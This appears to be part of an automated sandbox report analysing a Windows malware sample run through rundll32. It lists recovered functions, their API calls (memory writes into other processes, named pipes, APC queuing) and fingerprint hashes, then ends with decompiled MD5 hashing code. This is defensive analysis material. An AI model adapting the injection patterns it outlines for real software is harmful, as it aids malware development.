                                                            • Part of subcall function 0558A71C: SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          • GetLastError.KERNEL32(?,00000318,00000008), ref: 05585708
                                                            • Part of subcall function 05579D36: RtlNtStatusToDosError.NTDLL(00000000), ref: 05579D4E
                                                          • memcpy.NTDLL(00000218,05594EE0,00000100,?,00010003,?,?,00000318,00000008), ref: 05585687
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 055856E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 2966525677-3916222277
                                                          • Opcode ID: e0ce07847dbcdd380bebc373c8b19becc77b940362ec6fb429a63a82793c7095
                                                          • Instruction ID: 7fcc60c7679421bde10f40183834b055f485651630d785622115e7cb32a5ed77
                                                          • Opcode Fuzzy Hash: e0ce07847dbcdd380bebc373c8b19becc77b940362ec6fb429a63a82793c7095
                                                          • Instruction Fuzzy Hash: 95319371901609EFDF20EFA5D889BBAB7F9FB04354F10456EE546E7240EB30AE448B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055790A1, Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          • API String ID: 368790112-0
                                                          • Opcode ID: 524accb04d52cb7e0153776583129b7142651e0a49ba38366245d02829f7103b
                                                          • Instruction ID: f847dfea49ac633d983e58fc18b814b82e5a67bc389af507ef1c85b4f0540506
                                                          • Opcode Fuzzy Hash: 524accb04d52cb7e0153776583129b7142651e0a49ba38366245d02829f7103b
                                                          • Instruction Fuzzy Hash: E5F1F130604B9ADFCB31CFA9D484AEABBF5FF41700F14496DC5D796681D232AA45CB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05575166, Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 055751BC
                                                          • lstrlenW.KERNEL32(?), ref: 055751CA
                                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 055751F5
                                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 05575222
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Query$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3961825720-0
                                                          • Opcode ID: 8e82a22ea62e22467e322177ae3c8f4b7de8e5befaac765c49714c9ab696be56
                                                          • Instruction ID: 57ac9ce55849acd76a7231bcb73d25b1f79b9c479069e8d8d0faa97d4e422666
                                                          • Opcode Fuzzy Hash: 8e82a22ea62e22467e322177ae3c8f4b7de8e5befaac765c49714c9ab696be56
                                                          • Instruction Fuzzy Hash: 40415B7161420EEFDF118FE8D884AAEBBB8FF04310F154069F906A6210EB75DA15AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558E3F3, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0559C1A8,0559C144), ref: 0558E417
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558E462
                                                            • Part of subcall function 05579C77: CreateThread.KERNEL32(00000000,00000000,00000000,05572D6E,00000000,0558EB74), ref: 05579C8E
                                                            • Part of subcall function 05579C77: QueueUserAPC.KERNEL32(05572D6E,00000000,05571AE4,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CA3
                                                            • Part of subcall function 05579C77: GetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CAE
                                                            • Part of subcall function 05579C77: TerminateThread.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CB8
                                                            • Part of subcall function 05579C77: CloseHandle.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CBF
                                                            • Part of subcall function 05579C77: SetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CC8
                                                          • GetLastError.KERNEL32(055930B6,00000000,00000000), ref: 0558E44A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0558E45A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 1700061692-0
                                                          • Opcode ID: ae253109197d4d7be0e11c45283640cf2c90e4f6ae762ae55b82dd6f740a2e39
                                                          • Instruction ID: c60f8342484599c9ae6a209e7554ac6cef8f1d769636e66a3d32557ddd1b5952
                                                          • Opcode Fuzzy Hash: ae253109197d4d7be0e11c45283640cf2c90e4f6ae762ae55b82dd6f740a2e39
                                                          • Instruction Fuzzy Hash: 9BF02870305211AFF7146B689C8AE373BBCFB49371B110236F516D23E0DA684C09AA78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590BAB, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationThread.NTDLL(00000000,00000000,?,0000001C,00000000), ref: 05590BBF
                                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 05590BFF
                                                            • Part of subcall function 05588890: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,055856C2,00000000,?,055856C2,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 055888AE
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05590C08
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                                          • String ID:
                                                          • API String ID: 4036914670-0
                                                          • Opcode ID: 4b5491ca9629c989ab6d8d1645b9861844e5d3d726a4be6af158bb5ef77b9ea3
                                                          • Instruction ID: 6c31fcff4fe2980717242cdddd1aa7127caf6013cc38a41dbd82df2aa575283f
                                                          • Opcode Fuzzy Hash: 4b5491ca9629c989ab6d8d1645b9861844e5d3d726a4be6af158bb5ef77b9ea3
                                                          • Instruction Fuzzy Hash: 8A01FF75A40108FBEF10AB95DD49DEEBBBEFB84700F100425FA41E2060E779D944DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557579C, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 055757CD
                                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05575804
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                          • String ID:
                                                          • API String ID: 2533303245-0
                                                          • Opcode ID: f24019a7e138dd3574348eb1f9148ce34f9df54185f68cfa9915a86c9b077320
                                                          • Instruction ID: 4559903a96b10209a5522ee9316bf5d5b25bc2f66cb0aed82c3205f990143bfa
                                                          • Opcode Fuzzy Hash: f24019a7e138dd3574348eb1f9148ce34f9df54185f68cfa9915a86c9b077320
                                                          • Instruction Fuzzy Hash: 6701FE3690252CFBDB219A95E948DAFBB69FF81A90F160155BD0667100F7348E01D6D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05580FBD, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 05580FDC
                                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 05580FF4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuerymemset
                                                          • String ID:
                                                          • API String ID: 2040988606-0
                                                          • Opcode ID: 3c34bc7d07feb9346174ce94757bab58973c791fbb1ba974ca9555ed02862776
                                                          • Instruction ID: 908d2d20e14aac828618faebbffcd63743f2fae8b44095bf802fb1d80c97934b
                                                          • Opcode Fuzzy Hash: 3c34bc7d07feb9346174ce94757bab58973c791fbb1ba974ca9555ed02862776
                                                          • Instruction Fuzzy Hash: 0CF0F475A04259BADB21EA91DC09FEEBBBCAB04740F004061AA08F6191E774EA55CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05580CEF, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05580D1C
                                                          • SetLastError.KERNEL32(00000000,?,05577A37,?,?,?,00000040,?,?,?,?), ref: 05580D23
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$LastStatus
                                                          • String ID:
                                                          • API String ID: 4076355890-0
                                                          • Opcode ID: 0a88b2ba4dd368480cec6a95ba19211e43f1a65978ae8beeeac3f595ae4d30f9
                                                          • Instruction ID: f8873c9b2c147880559c1b6e9692072769ed5de7e9708679da4d232286806774
                                                          • Opcode Fuzzy Hash: 0a88b2ba4dd368480cec6a95ba19211e43f1a65978ae8beeeac3f595ae4d30f9
                                                          • Instruction Fuzzy Hash: BDE0123661521EABCF016FD4AC09D9ABF5DFB08791B014021BE01D2131DB35D424ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557FBA9, Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0557FF81
                                                          • memset.NTDLL ref: 0557FF90
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923AE
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923BA
                                                            • Part of subcall function 0559239D: memset.NTDLL ref: 055923E5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 9a10150b6ce8c76654baede92a6d00dd6eea4b839648e2d8b640ed2c100bc086
                                                          • Instruction ID: b30ddc8a0917a407007ad25708f7c9a964b47b08f4cd83e970b84b58bd93601b
                                                          • Opcode Fuzzy Hash: 9a10150b6ce8c76654baede92a6d00dd6eea4b839648e2d8b640ed2c100bc086
                                                          • Instruction Fuzzy Hash: AE022F70501B65DFCB79CF29D680926BBF1BF457107605A2ED6EB86AA0E731F881CB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558DAED, Relevance: 1.9, APIs: 1, Instructions: 610COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: b58ea40f2933ab93ab55862e6c3319b0444f02855c9852e7845f0c67bc307517
                                                          • Instruction ID: 6055732113628c2d99050b905e21cd9354c3775a77a743607a7ddd9d2050ce7a
                                                          • Opcode Fuzzy Hash: b58ea40f2933ab93ab55862e6c3319b0444f02855c9852e7845f0c67bc307517
                                                          • Instruction Fuzzy Hash: B822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E51754, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00E51754(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                          0x00e51757
                                                          0x00e51762
                                                          0x00e51765
                                                          0x00e51768
                                                          0x00e51769
                                                          0x00e51769
                                                          0x00e51774
                                                          0x00e51785
                                                          0x00e51787
                                                          0x00e5178a
                                                          0x00e5178a
                                                          0x00e5178d
                                                          0x00e5178d
                                                          0x00e51790
                                                          0x00e51790
                                                          0x00e51793
                                                          0x00e51793
                                                          0x00e517b0
                                                          0x00e517b3
                                                          0x00e517c9
                                                          0x00e517cc
                                                          0x00e517e6
                                                          0x00e517e9
                                                          0x00e517ff
                                                          0x00e51802
                                                          0x00e51804
                                                          0x00e5181c
                                                          0x00e5181f
                                                          0x00e51822
                                                          0x00e5183a
                                                          0x00e5183d
                                                          0x00e51857
                                                          0x00e5185a
                                                          0x00e51870
                                                          0x00e51873
                                                          0x00e51875
                                                          0x00e5188d
                                                          0x00e51892
                                                          0x00e51895
                                                          0x00e518ab
                                                          0x00e518ae
                                                          0x00e518c8
                                                          0x00e518cb
                                                          0x00e518e1
                                                          0x00e518e4
                                                          0x00e518e6
                                                          0x00e51901
                                                          0x00e51904
                                                          0x00e5191b
                                                          0x00e5191e
                                                          0x00e51922
                                                          0x00e5193b
                                                          0x00e5193e
                                                          0x00e51940
                                                          0x00e51943
                                                          0x00e5195e
                                                          0x00e51961
                                                          0x00e5197a
                                                          0x00e5197d
                                                          0x00e5198d
                                                          0x00e51990
                                                          0x00e519a8
                                                          0x00e519ab
                                                          0x00e519c5
                                                          0x00e519c8
                                                          0x00e519e0
                                                          0x00e519e3
                                                          0x00e519f9
                                                          0x00e519fc
                                                          0x00e51a14
                                                          0x00e51a17
                                                          0x00e51a2f
                                                          0x00e51a32
                                                          0x00e51a4c
                                                          0x00e51a4f
                                                          0x00e51a65
                                                          0x00e51a68
                                                          0x00e51a80
                                                          0x00e51a83
                                                          0x00e51a9d
                                                          0x00e51aa0
                                                          0x00e51ab8
                                                          0x00e51abb
                                                          0x00e51ad1
                                                          0x00e51ad4
                                                          0x00e51aec
                                                          0x00e51aef
                                                          0x00e51b07
                                                          0x00e51b0a
                                                          0x00e51b1c
                                                          0x00e51b1f
                                                          0x00e51b31
                                                          0x00e51b34
                                                          0x00e51b46
                                                          0x00e51b49
                                                          0x00e51b4d
                                                          0x00e51b5d
                                                          0x00e51b60
                                                          0x00e51b6e
                                                          0x00e51b71
                                                          0x00e51b83
                                                          0x00e51b86
                                                          0x00e51b9a
                                                          0x00e51b9d
                                                          0x00e51b9f
                                                          0x00e51baf
                                                          0x00e51bb2
                                                          0x00e51bc4
                                                          0x00e51bc7
                                                          0x00e51bd5
                                                          0x00e51bd8
                                                          0x00e51bea
                                                          0x00e51bed
                                                          0x00e51bf1
                                                          0x00e51c01
                                                          0x00e51c04
                                                          0x00e51c16
                                                          0x00e51c19
                                                          0x00e51c27
                                                          0x00e51c2a
                                                          0x00e51c3c
                                                          0x00e51c3f
                                                          0x00e51c51
                                                          0x00e51c54
                                                          0x00e51c68
                                                          0x00e51c6b
                                                          0x00e51c7f
                                                          0x00e51c82
                                                          0x00e51c96
                                                          0x00e51c99
                                                          0x00e51cad
                                                          0x00e51cb0
                                                          0x00e51cc4
                                                          0x00e51cc7
                                                          0x00e51cdb
                                                          0x00e51ce0
                                                          0x00e51cf2
                                                          0x00e51cf5
                                                          0x00e51d09
                                                          0x00e51d0c
                                                          0x00e51d20
                                                          0x00e51d23
                                                          0x00e51d39
                                                          0x00e51d3c
                                                          0x00e51d50
                                                          0x00e51d53
                                                          0x00e51d65
                                                          0x00e51d68
                                                          0x00e51d7c
                                                          0x00e51d7f
                                                          0x00e51d93
                                                          0x00e51d96
                                                          0x00e51daa
                                                          0x00e51db3
                                                          0x00e51db6
                                                          0x00e51dbf
                                                          0x00e51dc8
                                                          0x00e51dd0
                                                          0x00e51dd8
                                                          0x00e51de2
                                                          0x00e51df7

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
